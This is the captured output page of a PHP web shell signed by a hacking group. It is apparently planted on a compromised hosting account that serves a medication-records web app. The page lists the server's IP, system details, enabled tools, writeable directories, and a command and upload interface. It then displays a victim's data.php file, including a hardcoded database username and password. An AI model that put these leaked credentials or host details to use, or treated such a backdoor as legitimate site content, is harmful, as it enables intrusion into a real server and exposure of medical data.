Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.138.35.193
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//data.php
<?php
session_start();
require_once("../dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
?>

<table id='example2' class='table table-bordered table-hover>
                  <tr>
                  
    <div class='card-header d-flex p-0'>
                    <ul class='nav nav-pills ml-auto p-2'>
      
         <th><strong>Drugs</strong></th>
          <th><strong>Dose(mg)</strong></th> 
          <th><strong>Route</strong></th>
           <th><strong>Frequency</strong></th>
           <th><strong>Duration</strong></th>
              <th><strong>Edit</strong></th>
                </tr>
<?php 

$conn = new mysqli('localhost', 'easenupo_hcosoftware', '@#admin@#', 'easenupo_hcosoftware');
if ($conn->connect_error) {
	die("Connection error: " . $conn->connect_error);
}

$result = $conn->query("SELECT * FROM medication");
if ($result->num_rows > 0) {
	while ($row = $result->fetch_assoc()) {
		$pavan=$row['drug'];
		$sravan=$row['dose'];
	
echo "<tr>
<td>$pavan</td>
<td>$sravan</td>
</tr>
";
}
}
?>
</table

Anon7 - 2022
AnonSec Team